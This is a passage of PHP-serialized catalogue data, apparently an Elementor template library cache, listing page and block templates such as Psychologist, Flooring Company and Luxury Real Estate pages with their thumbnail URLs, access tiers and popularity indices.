Pages\",\"Sale\",\"Shoes\"]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:803;s:11:\"trend_index\";i:642;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:370;a:20:{s:4:\"tmpl\";i:508;s:2:\"id\";i:5488;s:5:\"title\";s:7:\"About 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_8.png\";s:12:\"tmpl_created\";i:1520443524;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:307;s:11:\"trend_index\";i:169;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:371;a:20:{s:4:\"tmpl\";i:1060;s:2:\"id\";i:15384;s:5:\"title\";s:28:\"Dance Studio &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/10/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1603181738;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dance-studio-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:741;s:11:\"trend_index\";i:721;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:372;a:20:{s:4:\"tmpl\";i:556;s:2:\"id\";i:6122;s:5:\"title\";s:7:\"About 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2-1.png\";s:12:\"tmpl_created\";i:1520443661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:38;s:11:\"trend_index\";i:26;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:373;a:20:{s:4:\"tmpl\";i:1163;s:2:\"id\";i:17301;s:5:\"title\";s:53:\"Personal Chef &#8211; Thank You Page &#8211; Business\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2021/01/TYP-Personal-Chef.jpg\";s:12:\"tmpl_created\";i:1610903622;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/personal-chef-thank-you-page-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:43:\"[\"Chef\",\"Food\",\"Landing Pages\",\"Thank You\"]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:823;s:11:\"trend_index\";i:754;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:374;a:20:{s:4:\"tmpl\";i:1042;s:2:\"id\";i:15158;s:5:\"title\";s:26:\"Psychologist &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/09/About.jpg\";s:12:\"tmpl_created\";i:1600157561;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/psychologist-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:81;s:16:\"popularity_index\";i:618;s:11:\"trend_index\";i:426;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:375;a:20:{s:4:\"tmpl\";i:1164;s:2:\"id\";i:17313;s:5:\"title\";s:60:\"Development Course  &#8211; Thank You Page &#8211; Education\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/01/Dev-Course-TYP-.png\";s:12:\"tmpl_created\";i:1610903776;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/lp/development-course-thank-you-page-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:57:\"[\"Course Online\",\"Education\",\"Landing Pages\",\"Thank You\"]\";s:10:\"menu_order\";i:81;s:16:\"popularity_index\";i:834;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:376;a:20:{s:4:\"tmpl\";i:1045;s:2:\"id\";i:15197;s:5:\"title\";s:28:\"Psychologist &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/09/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1600160499;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/psychologist-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:82;s:16:\"popularity_index\";i:666;s:11:\"trend_index\";i:558;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:377;a:20:{s:4:\"tmpl\";i:509;s:2:\"id\";i:5496;s:5:\"title\";s:7:\"About 9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_8-1.png\";s:12:\"tmpl_created\";i:1520443526;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:82;s:16:\"popularity_index\";i:523;s:11:\"trend_index\";i:453;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:378;a:20:{s:4:\"tmpl\";i:1041;s:2:\"id\";i:15142;s:5:\"title\";s:25:\"Psychologist &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/09/Home.jpg\";s:12:\"tmpl_created\";i:1600156308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/psychologist-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:83;s:16:\"popularity_index\";i:464;s:11:\"trend_index\";i:297;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:379;a:20:{s:4:\"tmpl\";i:1044;s:2:\"id\";i:15188;s:5:\"title\";s:28:\"Psychologist &#8211; Pricing\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/09/Pricing.jpg\";s:12:\"tmpl_created\";i:1600159731;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/psychologist-pricing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:732;s:11:\"trend_index\";i:537;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:380;a:20:{s:4:\"tmpl\";i:684;s:2:\"id\";i:8961;s:5:\"title\";s:9:\"archive 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.1.jpg\";s:12:\"tmpl_created\";i:1528639909;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:79;s:11:\"trend_index\";i:15;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:381;a:20:{s:4:\"tmpl\";i:1043;s:2:\"id\";i:15167;s:5:\"title\";s:29:\"Psychologist &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/09/Services.jpg\";s:12:\"tmpl_created\";i:1600158206;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/psychologist-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:85;s:16:\"popularity_index\";i:606;s:11:\"trend_index\";i:379;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:382;a:20:{s:4:\"tmpl\";i:1036;s:2:\"id\";i:14932;s:5:\"title\";s:30:\"Flooring Company &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/08/About.png\";s:12:\"tmpl_created\";i:1597740110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/flooring-company-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:86;s:16:\"popularity_index\";i:488;s:11:\"trend_index\";i:319;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:383;a:20:{s:4:\"tmpl\";i:685;s:2:\"id\";i:8969;s:5:\"title\";s:9:\"archive 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.2.jpg\";s:12:\"tmpl_created\";i:1528700014;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:86;s:16:\"popularity_index\";i:250;s:11:\"trend_index\";i:124;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:384;a:20:{s:4:\"tmpl\";i:1037;s:2:\"id\";i:14998;s:5:\"title\";s:32:\"Flooring Company &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/08/Contact-Us.png\";s:12:\"tmpl_created\";i:1597740222;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/flooring-company-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:87;s:16:\"popularity_index\";i:553;s:11:\"trend_index\";i:380;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:385;a:20:{s:4:\"tmpl\";i:1038;s:2:\"id\";i:14965;s:5:\"title\";s:32:\"Flooring Company &#8211; Gallery\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/08/Gallery.png\";s:12:\"tmpl_created\";i:1597740353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/flooring-company-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:88;s:16:\"popularity_index\";i:371;s:11:\"trend_index\";i:291;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:386;a:20:{s:4:\"tmpl\";i:686;s:2:\"id\";i:8973;s:5:\"title\";s:9:\"archive 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.3.jpg\";s:12:\"tmpl_created\";i:1528700205;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:88;s:16:\"popularity_index\";i:176;s:11:\"trend_index\";i:54;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:387;a:20:{s:4:\"tmpl\";i:1282;s:2:\"id\";i:22417;s:5:\"title\";s:52:\"Finance Learning Platform &#8211; Under Construction\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Finance-Platform.png\";s:12:\"tmpl_created\";i:1647354987;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/finance-learning-platform-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:27:\"[\"Finance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:89;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:388;a:20:{s:4:\"tmpl\";i:1040;s:2:\"id\";i:14947;s:5:\"title\";s:33:\"Flooring company &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/08/Services.png\";s:12:\"tmpl_created\";i:1597740551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/flooring-company-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:90;s:16:\"popularity_index\";i:538;s:11:\"trend_index\";i:392;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:389;a:20:{s:4:\"tmpl\";i:1039;s:2:\"id\";i:14901;s:5:\"title\";s:29:\"Flooring Company &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/08/Home.png\";s:12:\"tmpl_created\";i:1597740474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/flooring-company-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:387;s:11:\"trend_index\";i:185;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:390;a:20:{s:4:\"tmpl\";i:687;s:2:\"id\";i:8977;s:5:\"title\";s:9:\"archive 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.4.jpg\";s:12:\"tmpl_created\";i:1528700326;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:354;s:11:\"trend_index\";i:396;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:391;a:20:{s:4:\"tmpl\";i:1252;s:2:\"id\";i:22146;s:5:\"title\";s:36:\"Home Decor Store &#8211; Coming Soon\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Home-Decore.png\";s:12:\"tmpl_created\";i:1647177514;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/home-decor-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:57:\"[\"Coming Soon\",\"Decor\",\"Interior Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:92;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:392;a:20:{s:4:\"tmpl\";i:688;s:2:\"id\";i:8981;s:5:\"title\";s:9:\"archive 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.5.jpg\";s:12:\"tmpl_created\";i:1528700484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:333;s:11:\"trend_index\";i:195;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:393;a:20:{s:4:\"tmpl\";i:1021;s:2:\"id\";i:14737;s:5:\"title\";s:32:\"Luxury Real Estate &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/About.png\";s:12:\"tmpl_created\";i:1595313527;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/luxury-real-estate-about-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:150;s:11:\"trend_index\";i:447;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:394;a:20:{s:4:\"tmpl\";i:689;s:2:\"id\";i:8985;s:5:\"title\";s:9:\"archive 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.6.jpg\";s:12:\"tmpl_created\";i:1528700612;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:204;s:11:\"trend_index\";i:95;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:395;a:20:{s:4:\"tmpl\";i:1020;s:2:\"id\";i:14756;s:5:\"title\";s:34:\"Luxury Real Estate &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Contact-Us.png\";s:12:\"tmpl_created\";i:1595313519;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/luxury-real-estate-contact-us-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:610;s:11:\"trend_index\";i:569;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:396;a:20:{s:4:\"tmpl\";i:1019;s:2:\"id\";i:14716;s:5:\"title\";s:31:\"Luxury Real Estate &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Home.png\";s:12:\"tmpl_created\";i:1595313512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:95;s:16:\"popularity_index\";i:394;s:11:\"trend_index\";i:165;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:397;a:20:{s:4:\"tmpl\";i:690;s:2:\"id\";i:8989;s:5:\"title\";s:9:\"archive 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.7.jpg\";s:12:\"tmpl_created\";i:1528701063;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:208;s:11:\"trend_index\";i:111;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:398;a:20:{s:4:\"tmpl\";i:1018;s:2:\"id\";i:14763;s:5:\"title\";s:31:\"Luxury Real Estate &#8211; News\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/07/news-Archive.png\";s:12:\"tmpl_created\";i:1595313273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-news-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:404;s:11:\"trend_index\";i:167;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:399;a:20:{s:4:\"tmpl\";i:1283;s:2:\"id\";i:22423;s:5:\"title\";s:39:\"Online Store &#8211; Under 